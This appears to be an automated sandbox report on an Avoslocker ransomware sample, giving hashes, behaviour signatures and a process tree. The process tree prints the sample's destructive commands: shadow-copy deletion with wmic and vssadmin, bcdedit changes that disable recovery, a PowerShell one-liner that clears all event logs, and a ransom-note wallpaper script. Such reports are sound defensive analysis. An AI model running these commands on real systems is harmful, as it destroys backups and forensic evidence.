Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-12-2024 00:27
Static task
static1
Behavioral task
behavioral1
Sample
ransomware.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ransomware.exe
Resource
win10v2004-20241007-en
General
-
Target
ransomware.exe
-
Size
807KB
-
MD5
8da384b2427b8397a5934182c159c257
-
SHA1
7bcd2d32a19c1ac7bd014dc9e64b806fdff5f5de
-
SHA256
f8e99bbacc62b0f72aa12f5f92e35607fa0382a881fe4a4b9476fc6b87a03c78
-
SHA512
3c4b1736efa48a4897769f12df488e60737523eaffc886ecfbd5b7191f058749bdb4a36feb067e8ca0ef418a7602b3390b6cf465412b88a4ba2fce8a4d670a89
-
SSDEEP
12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYAu:u4s+oT+NXBLi0rjFXvyHBlb6CZa8
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2236 bcdedit.exe 3272 bcdedit.exe -
Renames multiple (10408) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI ransomware.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: ransomware.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2012890814.png" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\HEADER.GIF ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02886_.WMF ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\calendar.js ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar ransomware.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\GET_YOUR_FILES_BACK.txt ransomware.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\css\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewFrame.html ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR6B.GIF ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT_F_COL.HXK ransomware.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo ransomware.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html ransomware.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Tulip.jpg ransomware.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Grid.eftx ransomware.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 ransomware.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR40F.GIF ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar ransomware.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda ransomware.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG ransomware.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSEnv\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\gadget.xml ransomware.exe File opened for modification C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui ransomware.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt ransomware.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\MS.PNG ransomware.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif ransomware.exe File created C:\Program Files\Microsoft Games\More Games\de-DE\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png ransomware.exe File created C:\Program Files\Windows NT\Accessories\fr-FR\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\SmallLogoDev.png ransomware.exe File opened for modification C:\Program Files\DVD Maker\ja-JP\DVDMaker.exe.mui ransomware.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Tags.accft ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01146_.WMF ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png ransomware.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay ransomware.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\css\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE05869_.WMF ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00629_.WMF ransomware.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png ransomware.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp ransomware.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ODBCR.SAM ransomware.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml ransomware.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\GET_YOUR_FILES_BACK.txt ransomware.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar ransomware.exe -
pid Process 496 powershell.exe 5388 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ransomware.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3304 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1096 ransomware.exe 496 powershell.exe 5388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 1096 ransomware.exe Token: SeIncreaseQuotaPrivilege 2104 WMIC.exe Token: SeSecurityPrivilege 2104 WMIC.exe Token: SeTakeOwnershipPrivilege 2104 WMIC.exe Token: SeLoadDriverPrivilege 2104 WMIC.exe Token: SeSystemProfilePrivilege 2104 WMIC.exe Token: SeSystemtimePrivilege 2104 WMIC.exe Token: SeProfSingleProcessPrivilege 2104 WMIC.exe Token: SeIncBasePriorityPrivilege 2104 WMIC.exe Token: SeCreatePagefilePrivilege 2104 WMIC.exe Token: SeBackupPrivilege 2104 WMIC.exe Token: SeRestorePrivilege 2104 WMIC.exe Token: SeShutdownPrivilege 2104 WMIC.exe Token: SeDebugPrivilege 2104 WMIC.exe Token: SeSystemEnvironmentPrivilege 2104 WMIC.exe Token: SeRemoteShutdownPrivilege 2104 WMIC.exe Token: SeUndockPrivilege 2104 WMIC.exe Token: SeManageVolumePrivilege 2104 WMIC.exe Token: 33 2104 WMIC.exe Token: 34 2104 WMIC.exe Token: 35 2104 WMIC.exe Token: SeIncreaseQuotaPrivilege 2104 WMIC.exe Token: SeSecurityPrivilege 2104 WMIC.exe Token: SeTakeOwnershipPrivilege 2104 WMIC.exe Token: SeLoadDriverPrivilege 2104 WMIC.exe Token: SeSystemProfilePrivilege 2104 WMIC.exe Token: SeSystemtimePrivilege 2104 WMIC.exe Token: SeProfSingleProcessPrivilege 2104 WMIC.exe Token: SeIncBasePriorityPrivilege 2104 WMIC.exe Token: SeCreatePagefilePrivilege 2104 WMIC.exe Token: SeBackupPrivilege 2104 WMIC.exe Token: SeRestorePrivilege 2104 WMIC.exe Token: SeShutdownPrivilege 2104 WMIC.exe Token: SeDebugPrivilege 2104 WMIC.exe Token: SeSystemEnvironmentPrivilege 2104 WMIC.exe Token: SeRemoteShutdownPrivilege 2104 WMIC.exe Token: SeUndockPrivilege 2104 WMIC.exe Token: SeManageVolumePrivilege 2104 WMIC.exe Token: 33 2104 WMIC.exe Token: 34 2104 WMIC.exe Token: 35 2104 WMIC.exe Token: SeBackupPrivilege 3904 vssvc.exe Token: SeRestorePrivilege 3904 vssvc.exe Token: SeAuditPrivilege 3904 vssvc.exe Token: SeDebugPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeSecurityPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeSecurityPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeSecurityPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeSecurityPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeSecurityPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeSecurityPrivilege 496 powershell.exe Token: SeBackupPrivilege 496 powershell.exe Token: SeSecurityPrivilege 496 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 1096 wrote to memory of 2532 1096 ransomware.exe 31 PID 1096 wrote to memory of 2532 1096 ransomware.exe 31 PID 1096 wrote to memory of 2532 1096 ransomware.exe 31 PID 1096 wrote to memory of 2532 1096 ransomware.exe 31 PID 1096 wrote to memory of 2072 1096 ransomware.exe 32 PID 1096 wrote to memory of 2072 1096 ransomware.exe 32 PID 1096 wrote to memory of 2072 1096 ransomware.exe 32 PID 1096 wrote to memory of 2072 1096 ransomware.exe 32 PID 1096 wrote to memory of 2076 1096 ransomware.exe 33 PID 1096 wrote to memory of 2076 1096 ransomware.exe 33 PID 1096 wrote to memory of 2076 1096 ransomware.exe 33 PID 1096 wrote to memory of 2076 1096 ransomware.exe 33 PID 1096 wrote to memory of 2396 1096 ransomware.exe 34 PID 1096 wrote to memory of 2396 1096 ransomware.exe 34 PID 1096 wrote to memory of 2396 1096 ransomware.exe 34 PID 1096 wrote to memory of 2396 1096 ransomware.exe 34 PID 1096 wrote to memory of 2940 1096 ransomware.exe 35 PID 1096 wrote to memory of 2940 1096 ransomware.exe 35 PID 1096 wrote to memory of 2940 1096 ransomware.exe 35 PID 1096 wrote to memory of 2940 1096 ransomware.exe 35 PID 2940 wrote to memory of 496 2940 cmd.exe 37 PID 2940 wrote to memory of 496 2940 cmd.exe 37 PID 2940 wrote to memory of 496 2940 cmd.exe 37 PID 2076 wrote to memory of 2236 2076 cmd.exe 36 PID 2076 wrote to memory of 2236 2076 cmd.exe 36 PID 2076 wrote to memory of 2236 2076 cmd.exe 36 PID 2532 wrote to memory of 2104 2532 cmd.exe 38 PID 2532 wrote to memory of 2104 2532 cmd.exe 38 PID 2532 wrote to memory of 2104 2532 cmd.exe 38 PID 2396 wrote to memory of 3272 2396 cmd.exe 39 PID 2396 wrote to memory of 3272 2396 cmd.exe 39 PID 2396 wrote to memory of 3272 2396 cmd.exe 39 PID 2072 wrote to memory of 3304 2072 cmd.exe 40 PID 2072 wrote to memory of 3304 2072 cmd.exe 40 PID 2072 wrote to memory of 3304 2072 cmd.exe 40 PID 1096 wrote to memory of 5388 1096 ransomware.exe 46 PID 1096 wrote to memory of 5388 1096 ransomware.exe 46 PID 1096 wrote to memory of 5388 1096 ransomware.exe 46 PID 1096 wrote to memory of 5388 1096 ransomware.exe 46 PID 5388 wrote to memory of 2928 5388 powershell.exe 47 PID 5388 wrote to memory of 2928 5388 powershell.exe 47 PID 5388 wrote to memory of 2928 5388 powershell.exe 47 PID 5388 wrote to memory of 3380 5388 powershell.exe 48 PID 5388 wrote to memory of 3380 5388 powershell.exe 48 PID 5388 wrote to memory of 3380 5388 powershell.exe 48 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ransomware.exe"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:3304
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2236
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3272
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"2⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:496
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5388 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2012890814.png /f3⤵
- Sets desktop wallpaper using registry
PID:2928
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False3⤵PID:3380
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32KB
MD53c448ddcee1b63f8aae7d952e5061bdc
SHA13163bc4036c9068a56664179b9a0db0bbbce339e
SHA256ae6bd768e8208c7bd88184f51087c60069345142f7baa779a300b8d366ddc89f
SHA5125ae3644d243c4f347097dafbd6ffe97e26b85343e8264b2a0f7b099b3f181dc2e9a1c2b572f173a953117a44c055e26cd63025e9d2f2ffe6e3ec408ccb79a58b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d3db44c133970cef61166ea0b066d3eb
SHA190928858725de6da6b87d9fd2f78ef991acf77ae
SHA2561ae234419a1b3413fec4ab3457345080838eab84597183ebbcebb3aa730c3281
SHA51286ee98ca8e9dec14fa99e25ad5493f05edd88be45b1c57f04cf85a9ac851cb6fc123c86d1a1161c3262a1f4eda191005d5519b64823f73f73700aec65360cc4b
-
Filesize
1011B
MD501188d22b1675e3437b1418e14f4ffab
SHA16e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA5126903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d